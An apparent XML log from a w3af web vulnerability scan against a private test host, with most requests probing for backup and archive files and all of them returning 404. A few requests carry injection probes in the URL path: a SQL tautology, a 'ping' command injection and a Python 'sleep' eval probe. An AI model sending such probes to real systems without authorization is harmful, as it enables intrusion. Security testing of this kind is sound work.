&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="433">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="434">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="436">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="437">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="439">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="440">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="441">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="442">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="444">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="445">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="554" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="447">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="448">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="449">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29%22+OR+%2229%22%3D%2229 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 29%22+OR+%2229%22%3D%2229 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='29%22+OR+%2229%22%3D%2229'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="450">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="453">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="454">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="455">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="456">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.backup HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="460">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="463">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/__import__%28%27time%27%29.sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="572" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/__import__%28%27time%27%29.sleep%283%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="465">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
